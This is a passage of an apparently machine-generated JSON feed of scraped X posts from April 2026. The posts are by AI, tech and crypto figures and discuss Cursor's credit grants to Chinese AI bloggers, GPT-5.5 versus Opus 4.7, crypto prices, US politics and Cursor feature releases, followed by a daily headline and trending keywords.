are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nSuperintelligent machines can't come fast enough because the real problem is not intelligence in the world.\n\nIt's the utter lack of it.", + "url": "https://x.com/ylecun/status/2048433973177573559", + "published_at": "2026-04-26T16:08:11+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "牛逼,卡神又出教程了\n\n4美分/天、KiteSim香港卡,免实名+独享虚拟号\n\n马上跟着教程申请一张!!!", + "url": "https://x.com/gkxspace/status/2048412096665145411", + "published_at": "2026-04-26T14:41:16+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》\n @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。\n\n 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。\n 2. 0xAA @0xAA_Science 北大计算机博士,WTF Academy创始人。\n 3. 比特币橙子 @oragnes 比特币持有者、加密投资人,同时热衷 AI 与 Vibe Coding,自建了 AI Agents 工具平台 OwlClawHub。\n 4. 铁锤人 @lxfater AI博主,用AI协助创业,维护GitHub 3w star项目。\n 5. 雪踏乌云 @Pluvio9yte 大厂程序员,专注分享 Vibe Coding、AI 编程与出海实战干货。\n 6. 凡人小北 @frxiaobei 商业与管理咨询顾问、AI 战略顾问,长期在真实业务中实践 AIGC 落地。\n 7. Berryxia @berryxia 专注构建AI工具、系统Prompt,热爱设计与分享Prompt。\n 8. 奶昔🥤 @realNyarime Naixi Networks创始人,专注eSIM与奶昔论坛。\n 9. Ding @dingyi 产品设计师,运营 SaasPick、TopFeed 等多个独立产品,拥有15万粉丝。\n 10. CuiMao @CuiMao AI开发者博主,专注深度学习、NVIDIA与ComfyUI,建免费AI学习群。\n 11. Leo @runes_leo AI × Crypto 独立构建者,Runesgang 符文堂创始人,专注比特币生态与链上量化研究。\n 12. 泊舟 @bozhou_ai 2.1万粉AI博主,AI程序员&Vibe编码者,专注构建Agent与Prompt。\n 13. Jason Zhu @GoSailGlobal 独立开发者,专注 SaaS 出海与 AI 内容分享,并创建了 Agent Skills 聚合站。\n 14. 余温 @gkxspace AI博主,05年连续创业者,专注AI产品构建与商业化,项目营收7位数+。\n 15. Steven Lynn @Stv_Lynn FirstLabAI主持人与Crazy Saturday活动主办者。", + "url": "https://x.com/bozhou_ai/status/2048390603030032670", + "published_at": "2026-04-26T13:15:51+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵", + "url": "https://x.com/bozhou_ai/status/2048386685399142532", + "published_at": "2026-04-26T13:00:17+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的!\n\n2:但是甲方需要 4K 图。或者 PSD 图层!\n\n3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。\nMD 居然给我做了!改给了我一个分层压缩包!\n\n4:里面的图片居然是 4K 尺寸的!\n\n5:所以我们能通过这个方法获得 GPT 的 4K 图片!", + "url": "https://x.com/frxiaobei/status/2048366332639674706", + "published_at": "2026-04-26T11:39:25+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI", + "url": "https://x.com/frxiaobei/status/2048319988826820941", + "published_at": "2026-04-26T08:35:15+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。\n\n另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。\n\nhttps://github.com/AmazingAng/auth2api", + "url": "https://x.com/0xAA_Science/status/2048296373569941533", + "published_at": "2026-04-26T07:01:25+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。\n\nopus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。", + "url": "https://x.com/0xAA_Science/status/2048254571622113742", + "published_at": "2026-04-26T04:15:19+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "嗨 @nikitabier @elonmusk\n\n你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。\n\n我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。", + "url": "https://x.com/wolfyxbt/status/2048250984644960630", + "published_at": "2026-04-26T04:01:04+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事!\n\n枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。", + "url": "https://x.com/0xAA_Science/status/2048229814172275062", + "published_at": "2026-04-26T02:36:56+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "好久不见,宝子们,近来可好啊", + "url": "https://x.com/chuxiaeth/status/2048229604784308266", + "published_at": "2026-04-26T02:36:06+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽,川普又被枪击了 😱", + "url": "https://x.com/wolfyxbt/status/2048223317019316568", + "published_at": "2026-04-26T02:11:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/quote-bud…", + "url": "https://x.com/Stv_Lynn/status/2048109932751560818", + "published_at": "2026-04-25T18:40:34+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像", + "url": "https://x.com/Stv_Lynn/status/2048109929203212615", + "published_at": "2026-04-25T18:40:33+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Cursor 送的 10000 刀,我拿来做了什么\n\n昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录\n\n1. 写了个主页\n想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构\n(文案请忽略不代表最终效果)\n\n感觉吃上细糠了!", + "url": "https://x.com/Stv_Lynn/status/2048109919266852875", + "published_at": "2026-04-25T18:40:31+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: agent.creao.ai/signup?ref=Ws…", + "url": "https://x.com/gkxspace/status/2048070713601376712", + "published_at": "2026-04-25T16:04:44+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。", + "url": "https://x.com/wolfyxbt/status/2048056527731454048", + "published_at": "2026-04-25T15:08:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: x.com/gkxspace/status/204803…", + "url": "https://x.com/gkxspace/status/2048035672078844248", + "published_at": "2026-04-25T13:45:29+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。\n\n简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。\n\n我的提示词:\n我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套", + "url": "https://x.com/gkxspace/status/2048035527459319854", + "published_at": "2026-04-25T13:44:55+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "生财有术、得到新商学,哪个更好一些\n\n最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下\n\n你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔", + "url": "https://x.com/gkxspace/status/2048032521942626343", + "published_at": "2026-04-25T13:32:58+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: Image", + "url": "https://x.com/wolfyxbt/status/2048032308637442215", + "published_at": "2026-04-25T13:32:07+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "2019 年,孙哥放了巴菲特的鸽子;\n2026 年,嗯哼放了特朗普的鸽子。\n\n币圈真是个神奇的地方!", + "url": "https://x.com/wolfyxbt/status/2048031889789972748", + "published_at": "2026-04-25T13:30:27+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。\n\n从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工程、Agent、代码实践,可以很自然地聊一个小时,很多地方甚至比我理解得更深。\n\n但也有不少同学,学习成绩很好,计算机基础也扎实,只是因为家庭条件或预算有限,平时只能用国内中转站或更便宜的国产模型套餐,这个差距非常现实。现在最好的国产模型和国外一线模型,在 模型综合能力上大概还有半年左右的时间差。以前没有 AI 的时候,资源差距最多只是效率差一点,现在会直接影响视野、实践深度和自信心。\n\n这件事我最近一直在琢磨,对一些本来很有潜力的学生来说,只是因为每个月几十美元的门槛,就少接触了很多东西,我觉得挺可惜。想起我当时读大学的时候其实也经常阆中羞涩,好在大二认识了不少大牛学长带着我开始做商业项目养好了自己,挺感谢当时很耐心教我技术的各种朋友。\n\n所以我想做一个很小的尝试:拿一部分 X 发推收益,资助几位学习成绩不错、喜欢计算机、但家庭条件不太宽裕的同学,给他们提供几个月 Claude Code 或类似 AI Coding 工具的订阅,让他们真正体验一下目前比较好的模型和开发方式。\n\n不过我自己平时也比较忙,不太可能一个人长期处理申请、筛选、核验和跟进。所以也想顺便邀请一些对此有想法的朋友一起做。比如高校老师、学生负责人、开源社区成员,或者本身就在做教育、公益、开发者社区的朋友,可以一起帮忙想一个更靠谱的机制。\n\n这件事我暂时不想做大,也不想做成很复杂。先从小规模实验开始,比如每期 5 到 6 个同学,每人 3 到 4 个月,甚至也可以每周来找我视频问一些问题。想着优先看推荐、作品、学习记录和真实使用反馈,尽量避免变成单纯发钱或者拼谁会写申请,当然现在能上 X 的大学生应该不缺这个钱,所以还是需要看有没有更好的渠道。\n\n如果你有靠谱渠道,或者愿意一起参与规则设计、推荐、审核、跟进,欢迎私信我。能把这件事做得更可信一点,也许真的能帮到几个本来就很有潜力的同学。", + "url": "https://x.com/Stv_Lynn/status/2048011261473128477", + "published_at": "2026-04-25T12:08:29+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "虽然比特币回到 77,000 了,但是我还是非常悲观的\n\n我理想中的抄底价格是 35,000 的比特币\n\n感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。\n\n这种底我根本不敢抄呀,抄在半山腰至少得难受一年。\n\n感觉现在这种行情像是跌太久了跌不动了,狗庄掏点钱出来拉拉盘,榨干市场剩下的最后一点流动性,把平时比较保守但因为太久没操作的散户再钓出来收割一下。", + "url": "https://x.com/wolfyxbt/status/2047979690623955107", + "published_at": "2026-04-25T10:03:02+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了!\n这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。\n\n现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博主,其中只有 3 位是币圈赛道的博主,分别是:\n• 杀破狼 @wolfyxbt\n• 0xAA:@0xAA_Science\n• 比特币橙子 @oragnes\n\n其他的都是纯 AI 赛道的博主,建议给他们都点个关注,毕竟算是 Cursor 认证的博主,他们的推特:\n@lxfater 、@Pluvio9yte 、 @frxiaobei 、@berryxia 、 @realNyarime 、 @dingyi 、 @CuiMao 、 @runes_leo 、 @bozhou_ai 、 @GoSailGlobal 、 @gkxspace 、 @Stv_Lynn\n\n此信息收集多数来自于 @GoSailGlobal 博主的推文", + "url": "https://x.com/bozhou_ai/status/2047968587902820543", + "published_at": "2026-04-25T09:18:55+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我靠 Cursor 刚刚送了我 10,000 美金的额度!\n\n感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!", + "url": "https://x.com/wolfyxbt/status/2047948998250840240", + "published_at": "2026-04-25T08:01:04+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "去了趟书店,被震惊了,到底谁在买这些书啊😅", + "url": "https://x.com/gkxspace/status/2047922526685155786", + "published_at": "2026-04-25T06:15:53+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "忘了说了其实我也有👉👈\n\n感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!", + "url": "https://x.com/Stv_Lynn/status/2047909458484040105", + "published_at": "2026-04-25T05:23:57+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。\n\n平均算下来,每 1 次曝光有 0.000136 美金的收益;\n\n每 1 万次曝光 1.36 美金的收益。", + "url": "https://x.com/wolfyxbt/status/2047908983101628720", + "published_at": "2026-04-25T05:22:04+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/bozhou_ai/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "RT by @gkxspace: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/gkxspace/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "卧槽,收到 Cursor 送的 10,000u AI 额度! \n\n昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了!\n这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai", + "url": "https://x.com/0xAA_Science/status/2047889676867080420", + "published_at": "2026-04-25T04:05:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据", + "url": "https://x.com/wolfyxbt/status/2047877064104284194", + "published_at": "2026-04-25T03:15:14+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽!牛逼牛逼!\n\n这两周的工资涨到了 1799 美金!\n\nThank you Elon Musk!", + "url": "https://x.com/wolfyxbt/status/2047865010182148284", + "published_at": "2026-04-25T02:27:20+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Cursor大善人,我也已经领到了,在X上获得的最大一笔收入", + "url": "https://x.com/bozhou_ai/status/2047847486430286317", + "published_at": "2026-04-25T01:17:42+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download", + "url": "https://x.com/cursor_ai/status/2047764656165646786", + "published_at": "2026-04-24T19:48:34+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes.\n\nA single agent session can now target a reusable workspace made of multiple folders.", + "url": "https://x.com/cursor_ai/status/2047764654760632725", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window.\n\nRun isolated tasks in the background across different branches. When you're ready to test changes, move any branch into your local foreground with one click.", + "url": "https://x.com/cursor_ai/status/2047764652977958938", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Introducing /multitask in the new Cursor 3 interface.\n\nCursor can now run async subagents to parallelize your requests instead of adding them to the queue.\n\nFor already queued messages, you can ask Cursor to multitask on them instead of waiting for the current run to finish.", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + } + ], + "headline": "GPT-5.5发布会定档;Cursor SDK开放;Karpathy:Software 3.0拐点已至", + "trending_keywords": [ + "GPT-5.5", + "Cursor SDK", + "Software 3.0", + "Claude Code优化", + "纳斯达克25000" + ], + "top_themes": [ + { + "title": "其他", + "count": 321 + }, + { + "title": 